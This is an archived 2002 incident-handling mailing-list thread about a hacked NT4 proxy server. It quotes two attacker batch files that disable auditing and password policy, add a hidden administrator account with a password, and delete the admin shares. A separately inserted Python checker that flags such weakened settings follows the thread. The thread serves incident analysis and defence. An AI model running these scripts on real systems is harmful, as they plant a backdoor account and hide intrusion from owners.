Security Incidents mailing list archives
RE: Proxy server hit... Any ideas?
From: "darroch royden" <darroch.royden () blueyonder co uk>
Date: Wed, 20 Nov 2002 12:34:27 -0000
A favourite tool is xscan (xfocus.org), which among other options/plugins lets you choose ntpass, which brute forces bad passwords on the remote machine. I would imagine, especially since they are removing the hidden shares, that this is how they penetrated the machine. Hope this helps.

-----Original Message-----
From: Mike Cain [mailto:mikec () lpinsurance com]
Sent: 19 November 2002 9:29 PM
To: incidents () securityfocus com
Subject: RE: Proxy server hit... Any ideas?

I was really more looking for suggestions on 'how' the guy got in, and if it matched any known exploits. First off, I didn't build the box, and it wasn't my responsibility until about 3 weeks ago. Secondly, I do know a good bit about hardening a box, so I am in the process of rebuilding the Proxy to my specs (No FTP is DEFINITELY one of them since this company doesn't use FTP). Thanks for the help though.... such as it was...

Mike Cain

-----Original Message-----
From: Russell Harding [mailto:hardingr () cunap com]
Sent: Tuesday, November 19, 2002 3:04 PM
To: Mike Cain
Cc: incidents () securityfocus com
Subject: Re: Proxy server hit... Any ideas?

Mike,

It seems like you've been gotten by one of the many so called 'hackers' who troll the internet looking for unpatched NT boxen to use as rogue FTP (music/warez/movie) servers. The incidents list sees this sort of post about once a week... "I run NT, don't know security and got hit... what did I get?"

I could be just another person to direct you to the same sources the list always does (netstat, fport, etc...) But I would like to recommend the following: With an unknown backdoor installed on your system, you really can never know if you've eradicated the intruder. It is best to not really worry about what is there (keep the 'pirates booty' if you wish :) ) but focus on what to do about it. You need to re-format your drive, start from scratch with the machine _off_ the public internet until it is fully patched. Don't always trust windows update to keep you patched... It may help you to use a third party utility.

Good luck rebuilding your system,
-Russell

On Mon, 18 Nov 2002, Mike Cain wrote:
Well, I have had my first run-in with a hacker, or was it a virus? I'm not 100% sure.. Guess I should start from the beginning... A few days ago, I began to get user complaints on the slowness of the internet. I figured it was mostly them just wanting something to complain about, so I did what all crappy admins do, I ignored it.

Well, last night the box was rebooted after some software was updated. Today people were complaining about how PAINFULLY slow the internet was, so I looked at the proxy server. NT4 running proxy3. I know, there is newer better stuff, but it's what I have to work with. :) SO... I looked at the processes and noticed the CPU hovering at 35-50%.. Way too high. So a quick look at the process list showed two things that I didn't remember needing to be there, win.exe and start.exe. Next move was to find them, and they were in the winnt\system\ folder. What I also found odd was that there were three new folders in that directory all created on the 8th, NT, tools, and win. Here are the contents, respectively.

1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe (antivirus sees this one as a backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup
2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility Routine), and _zoLibr.dll
3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below), pidv32.dll, win.exe, x32.dll.bkup

SO, anyone know what I have or what hit me? From looking at the secure and secure1 batch files, it looks like a root kit... But I'm new at this side of security (I'm a Cisco guy...) Last thing, the logs show that the attacker was hitting the \scripts\sample\ folder... Meaning I think he was trying to use the old IIS Sample Scripts to execute local code... Not sure if he was successful... Thanks in advance!!

Mike Cain
CCNP/MCSE

Secure.bat =

@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo Adding User %1 with the Password %2 ...
net user /add slash 971985
echo Adding slash to the Local Administrator Group ...
net localgroup administrators slash /add
echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
echo System is now secure.

Secure1.bat =

net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld
#net share /delete IPC$ /y >> net.deld
del net.deld
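As an added example (not part of this thread and not any poster's code): a Python check that parses the INF-style secedit template which secure.bat writes to the file "temp" and flags the policy values such a template weakens (password and lockout limits, audit categories, restrictanonymous), which is what a defender wants to look for when a stray template or batch file turns up on a box. The sample template and the function names are constructed for illustration.

```python
# Constructed sample: the secedit template that secure.bat writes to the file
# "temp", trimmed to the lines this check looks at (not copied from any real host).
SAMPLE_TEMPLATE = r"""[Version]
signature="$CHICAGO$"
Revision=1
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditAccountLogon = 0
[Registry Values]
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
"""

def parse_template(text):
    """Parse an INF-style secedit template into {section: {key: value}}."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def weakened_settings(sections):
    """Return the settings a template like secure.bat's would weaken."""
    findings = []
    access = sections.get("System Access", {})
    for key in ("minimumpasswordlength", "passwordcomplexity", "lockoutbadcount"):
        if access.get(key) == "0":
            findings.append(f"System Access: {key} = 0")
    # An Event Audit category set to 0 means nothing in that category is logged.
    for key, value in sections.get("Event Audit", {}).items():
        if value == "0":
            findings.append(f"Event Audit: {key} disabled")
    # Registry Values lines are "path=type,data"; type 4 is REG_DWORD.
    for path, value in sections.get("Registry Values", {}).items():
        data = value.partition(",")[2]
        if path.endswith(r"\lsa\restrictanonymous") and data == "0":
            findings.append("Registry: restrictanonymous = 0 (null sessions allowed)")
    return findings
```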
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com